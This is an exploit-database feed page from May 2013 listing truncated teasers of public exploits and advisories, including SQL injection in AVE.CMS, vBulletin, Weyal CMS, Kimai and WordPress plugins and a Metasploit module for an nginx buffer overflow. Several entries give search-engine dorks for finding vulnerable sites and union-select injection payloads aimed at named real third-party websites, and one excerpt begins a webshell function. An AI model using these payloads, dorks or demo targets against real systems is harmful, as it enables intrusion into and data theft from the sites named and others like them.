JavaScript Execution in IBM WebSphere DataPower Services

24 May 2013 - Source: http://www.mondounix.com
SEC Consult Vulnerability Lab Security Advisory < 20130523-0 >
=======================================================================
              title: JavaScript Execution in WebSphere DataPower Services
            product: IBM WebSphere DataPower Integration Appliance XI50
 vulnerable version: 3.8.2, 4.0, 4.0.1, 4.0.2, 5.0.0
      fixed version: not available, config changes
         CVE number: CVE-2013-0499
             impact: Low/Medium
           homepage: https://www.ibm.com/
              found: 2013-01-28
                 by: A. Falkenberg
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================
 
Vendor/product...


Matterdaddy Market 1.4.2 Cross Site Request Forgery / Arbitrary File Upload

24 May 2013 - Source: http://www.mondounix.com
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0     _                   __           __       __                     1
# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
# 1                  \ \____/ >> Exploit database separated by exploit   0
# 0                   \/___/          type (local, remote,...


AVE.CMS 2.09 Blind SQL Injection

24 May 2013 - Source: http://www.mondounix.com
#!/usr/bin/env python
 
import urllib, sys, time
 
#######################################################################################
# Exploit Title: AVE.CMS <= 2.09 - Remote Blind SQL Injection Exploit
# Date: 23/05/2013
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Vendor Homepage: http://www.overdoze.ru/
# Software Link: websvn.avecms.ru/listing.php?repname=AVE.cms+2.09
# Version: V2.09 and 2.09RC2
# Tested on: Linux Debian 2.6.32-5-686
# Description: The "module" parameter is vulnerable to Blind SQL Injection.
# Solution : Update to newest version.
#######################################################################################
 
print "+----------------------------------------------------------+"
print...


vBulletin 5b SQL Injection

24 May 2013 - Source: http://www.mondounix.com
#!/usr/bin/perl
###################################################################################
#                                                          Saturday, March 30, 2013
#
#
#
#                    _  _  .__                .__               
#                 __| || |_|  |   ____   ____ |__| ____   ____  
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#
#...


Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow

23 May 2013 - Source: http://www.mondounix.com
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
 
  include Exploit::Remote::Tcp
 
  def initialize(info = {})
 
    super(update_info(info,
      'Name'           => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.
        The exploit first triggers an integer overflow in the ngx_http_parse_chunked()...


Weyal CMS SQL Injection

23 May 2013 - Source: http://www.mondounix.com
================================================
[-] Name: Weyal Cms SQL Injection Vulnerability
[-] Vendor: N/A
[-] Date: 2013-05-22
[-] Author: XroGuE
[-] Home: http://Att4ck3r.ir
================================================
[+] Dork:  intext:"Designed by Rohi.af"
      intext:"Designed by Dr. Weyal"
================================================
[+] Vulnerable Page:  fullstory.php?id= , countrys.php?countryid= , "check Another pages :)"
 
[+] Vuln:  www.[site].com/[path]/fullstory.php?id=SQLi
      www.[site].com/[path]/countrys.php?id=SQLi
 
[+] Demo:  http://mysurgery.ru/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
[+] Demo:  http://www.s-rohi.com/fullstory.php?id=-999...


WordPress Spider Catalog Multiple Vulnerabilities

22 May 2013 - Source: http://www.mondounix.com
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.
 
http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html
 
Vulnerable is current version 1.4.6, older versions...


WordPress Spider Event Calendar Multiple Vulnerabilities

22 May 2013 - Source: http://www.mondounix.com
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendars available in the WordPress Directory. If you
have problems with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.
 
http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html
 
Vulnerable...


WordPress Flagallery-Skins SQL Injection

22 May 2013 - Source: http://www.mondounix.com
##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : Medium
#
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
#...


Kimai 0.9.2.1306-3 SQL Injection

22 May 2013 - Source: http://www.mondounix.com
# Exploit Title: Kimai 0.9.2.1306-3 SQLi
# Date: 05/20/2013
# Exploit Author: drone (@dronesec)
# Vendor Homepage: http://www.kimai.org/
# Software Link: https://downloads.sourceforge.net/project/kimai/0.9.x/kimai.0.9.2.1306-3.zip 
# Version: 0.9.2.1306-3
# Fixed in: source repositories (https://github.com/kimai/kimai)
# Tested on: Windows XP SP3, Ubuntu 12.04 (apparmor disabled)
 
"""
    This doesn't even require authentication to the
    web app, as the file is accessible to any user.
 
    Modify paths accordingly if running against Windows
 
    @dronesec
"""
from argparse import ArgumentParser
import string
import random
import urllib2
import sys
import re
 
def webshell(options,...
